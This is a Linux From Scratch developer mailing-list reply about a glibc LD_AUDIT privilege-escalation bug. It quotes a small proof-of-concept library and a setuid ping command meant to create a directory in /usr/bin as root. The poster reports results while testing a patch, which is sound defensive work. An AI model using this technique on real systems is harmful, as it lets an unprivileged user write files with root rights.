On Sun, 24 Oct 2010 10:25:26 -0700, Bryan Kadzban <[email protected]>
wrote:
> You can make your own simple library like this:
>
> cat <<EOF >bad.c
> #include <stdlib.h>
> #include <sys/stat.h>
> #include <sys/types.h>
>
> void __attribute__((constructor)) init() {
> mkdir(getenv("EXPLOIT_TGT"), 0755);
> }
> EOF
> gcc -fPIC -shared -o /tmp/libbad.so.0 bad.c
>
> Now, if your glibc is broken, this will create the directory and print
> the ping usage message:
>
> LD_AUDIT=/tmp/libbad.so.0 EXPLOIT_TGT=/usr/bin/bad ping
>
> Whereas if your glibc is not broken (2.10.1 is not... :-) ), it will
> only print the ping usage.
I tried this on a freshly built LFS-20101024 but couldn't reproduce the
problem. As a non-root user I get just the ping usage message. As the
root user, I get:
ERROR: ld.so: object '/tmp/libbad.so.0' cannot be loaded as audit interface:
undefined symbol: la_version: ignored
followed by the ping usage message, which is what is described in the
vulnerability. However, there's still no /usr/bin/bad directory created.
I probably just screwed something up as the vulnerability as originally
described, using libpcprofile.so, which is built & installed as part
of the Glibc package, triggers the bug.
It'll be a while until I run another full build, but I'm recompiling glibc
now, with the patch I uploaded earlier. I'll post results tomorrow, but
expect it to work just fine.
Regards,
Matt.
--
http://linuxfromscratch.org/mailman/listinfo/lfs-dev
FAQ: http://www.linuxfromscratch.org/faq/
Unsubscribe: See the above information page
